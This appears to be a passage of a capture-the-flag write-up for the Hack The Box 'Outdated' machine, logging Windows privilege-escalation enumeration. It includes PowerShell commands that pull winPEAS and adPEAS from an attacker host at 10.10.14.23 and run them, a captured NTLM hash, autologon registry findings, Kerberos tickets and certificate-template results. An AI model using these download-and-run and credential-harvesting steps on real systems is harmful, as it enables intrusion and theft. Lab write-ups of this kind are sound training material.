PEAS
ps c:\Users\btables\Documents> iwr -uri http://10.10.14.23:2222/winPEASx64.exe -Outfile .\winPEASx64.exeDelivery complete over HTTP
Executing PEAS
Env
���������� User Environment Variables
� Check for some passwords or keys in the env variables
SystemDrive: C:
ProgramFiles(x86): C:\Program Files (x86)
USERDNSDOMAIN: OUTDATED.HTB
ProgramW6432: C:\Program Files
PROCESSOR_IDENTIFIER: AMD64 Family 23 Model 49 Stepping 0, AuthenticAMD
TMP: C:\Users\btables\AppData\Local\Temp
PROCESSOR_ARCHITECTURE: AMD64
DriverData: C:\Windows\System32\Drivers\DriverData
PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL
USERPROFILE: C:\Users\btables
PROCESSOR_REVISION: 3100
TEMP: C:\Users\btables\AppData\Local\Temp
FPS_BROWSER_APP_PROFILE_STRING: Internet Explorer
FPS_BROWSER_USER_PROFILE_STRING: Default
LOGONSERVER: \\DC
USERNAME: btables
SystemRoot: C:\Windows
OneDrive: C:\Users\btables\OneDrive
CommonProgramFiles: C:\Program Files\Common Files
ProgramData: C:\ProgramData
HOMEPATH: \Users\btables
COMPUTERNAME: CLIENT
CommonProgramFiles(x86): C:\Program Files (x86)\Common Files
ALLUSERSPROFILE: C:\ProgramData
CommonProgramW6432: C:\Program Files\Common Files
SESSIONNAME: Console
RecommendedLayer: NONE
HOMEDRIVE: C:
windir: C:\Windows
NUMBER_OF_PROCESSORS: 1
OS: Windows_NT
ProgramFiles: C:\Program Files
ComSpec: C:\Windows\system32\cmd.exe
PSModulePath: C:\Users\btables\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
PROMPT: $P$G
APPDATA: C:\Users\btables\AppData\Roaming
USERDOMAIN: OUTDATED
PROCESSOR_LEVEL: 23
Path: C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\btables\AppData\Local\Microsoft\WindowsApps;
LOCALAPPDATA: C:\Users\btables\AppData\Local
PSExecutionPolicyPreference: Bypass
USERDOMAIN_ROAMINGPROFILE: OUTDATED
PUBLIC: C:\Users\Public
���������� System Environment Variables
� Check for some passwords or keys in the env variables
ComSpec: C:\Windows\system32\cmd.exe
DriverData: C:\Windows\System32\Drivers\DriverData
OS: Windows_NT
Path: C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\
PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
PROCESSOR_ARCHITECTURE: AMD64
PSModulePath: C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
TEMP: C:\Windows\TEMP
TMP: C:\Windows\TEMP
USERNAME: SYSTEM
windir: C:\Windows
NUMBER_OF_PROCESSORS: 1
PROCESSOR_LEVEL: 23
PROCESSOR_IDENTIFIER: AMD64 Family 23 Model 49 Stepping 0, AuthenticAMD
PROCESSOR_REVISION: 3100LAPS
LSA Protection
Credentials Guard
Cached Creds
AV
UAC
PowerShell
c:\Users\btables\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Drives
PS C:\Users\btables\Documents> dir A:\
dir : Cannot find path 'A:\' because it does not exist.
At line:1 char:1
+ dir A:\
+ ~~~~~~~
+ CategoryInfo : ObjectNotFound: (A:\:String) [Get-ChildItem], ItemNotFoundException
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand
PS C:\Users\btables\Documents> dir D:\
dir : Cannot find path 'D:\' because it does not exist.
At line:1 char:1
+ dir D:\
+ ~~~~~~~
+ CategoryInfo : ObjectNotFound: (D:\:String) [Get-ChildItem], ItemNotFoundException
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommandFalse-Positive
WSUS
KrbRelayUp
NTLM
btables::OUTDATED:1122334455667788:04066798b7e544cc33f395d8d559a152:010100000000000050d7181a2640da014b03e1b8498b8ace000000000800300030000000000000000000000000200000aa2ec91dca5d8667f92f9c6393b2949ae0492bf60efa2397bb21bbde2990dcc00a00100000000000000000000000000000000000090000000000000000000000
GPO
.NET Version
Token Privileges
User Privileges of the btables user
AutoLogon
ps c:\Users\btables\Documents> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon
AutoRestartShell REG_DWORD 0x1
Background REG_SZ 0 0 0
CachedLogonsCount REG_SZ 10
DebugServerCommand REG_SZ no
DefaultDomainName REG_SZ outdated
DefaultUserName REG_SZ btables
DisableBackButton REG_DWORD 0x1
EnableSIHostIntegration REG_DWORD 0x1
ForceUnlockLogon REG_DWORD 0x0
LegalNoticeCaption REG_SZ
LegalNoticeText REG_SZ
PasswordExpiryWarning REG_DWORD 0x5
PowerdownAfterShutdown REG_SZ 0
PreCreateKnownFolders REG_SZ {A520A1A4-1780-4FF6-BD18-167343C5AF16}
ReportBootOk REG_SZ 1
Shell REG_SZ explorer.exe
ShellCritical REG_DWORD 0x0
ShellInfrastructure REG_SZ sihost.exe
SiHostCritical REG_DWORD 0x0
SiHostReadyTimeOut REG_DWORD 0x0
SiHostRestartCountLimit REG_DWORD 0x0
SiHostRestartTimeGap REG_DWORD 0x0
userinit reg_sz c:\Windows\system32\userinit.exe,
VMApplet REG_SZ SystemPropertiesPerformance.exe /pagefile
WinStationsDisabled REG_SZ 0
scremoveoption REG_SZ 0
DisableCAD REG_DWORD 0x1
LastLogOffEndTimePerfCounter REG_QWORD 0xa056900f
ShutdownFlags REG_DWORD 0x8000022b
AutoAdminLogon REG_SZ 1
DisableLockWorkstation REG_DWORD 0x0
EnableFirstLogonAnimation REG_DWORD 0x1
AutoLogonSID REG_SZ S-1-5-21-1427615864-4097738724-2873505330-1001
LastUsedUsername REG_SZ btables
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\AlternateShells
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\GPExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\UserDefaults
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\AutoLogonChecked
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\VolatileUserMgrKeyAutoLogon is configured for the btables user
Credential may be extracted by dumping memory
Modifiable Services
Installed Programs
Scheduled Tasks
Initially found and enumerated at a later stage
SMB
DNS
Kerberos Tickets
���������� Looking for Kerberos tickets
� https://book.hacktricks.xyz/pentesting/pentesting-kerberos-88
servername: krbtgt/OUTDATED.HTB
realmname: OUTDATED.HTB
starttime: 1/5/2024 2:05:56 PM
endtime: 1/6/2024 12:05:56 AM
renewtime: 1/12/2024 2:05:56 PM
encryptiontype: aes256_cts_hmac_sha1_96
ticketflags: name_canonicalize, pre_authent, renewable, forwarded, forwardable
=================================================================================================
servername: krbtgt/OUTDATED.HTB
realmname: OUTDATED.HTB
starttime: 1/5/2024 2:05:56 PM
endtime: 1/6/2024 12:05:56 AM
renewtime: 1/12/2024 2:05:56 PM
encryptiontype: aes256_cts_hmac_sha1_96
ticketflags: name_canonicalize, pre_authent, initial, renewable, forwardable
=================================================================================================
servername: ldap/DC.outdated.htb
realmname: OUTDATED.HTB
starttime: 1/5/2024 2:24:26 PM
endtime: 1/6/2024 12:05:56 AM
renewtime: 1/12/2024 2:05:56 PM
encryptiontype: aes256_cts_hmac_sha1_96
ticketflags: name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable
=================================================================================================
servername: cifs/DC
realmname: OUTDATED.HTB
starttime: 1/5/2024 2:24:26 PM
endtime: 1/6/2024 12:05:56 AM
renewtime: 1/12/2024 2:05:56 PM
encryptiontype: aes256_cts_hmac_sha1_96
ticketflags: name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable
=================================================================================================
servername: cifs/DC.outdated.htb
realmname: OUTDATED.HTB
starttime: 1/5/2024 2:05:56 PM
endtime: 1/6/2024 12:05:56 AM
renewtime: 1/12/2024 2:05:56 PM
encryptiontype: aes256_cts_hmac_sha1_96
ticketflags: name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable
=================================================================================================adPEAS
PS C:\Users\btables\Documents> iwr -uri http://10.10.14.23:2222/adPEAS.ps1 -Outfile .\adPEAS.ps1Delivery complete over HTTP
Executing adPEAS
Domain
ms-DS-MachineAccountQuota
ADCS
CA
outdated-DC-CA
EFS
WebServer
ENROLLEE_SUPPLIES_SUBJECT
Machine
User
SubCA
ENROLLEE_SUPPLIES_SUBJECT
SharpHound
Ingestion Complete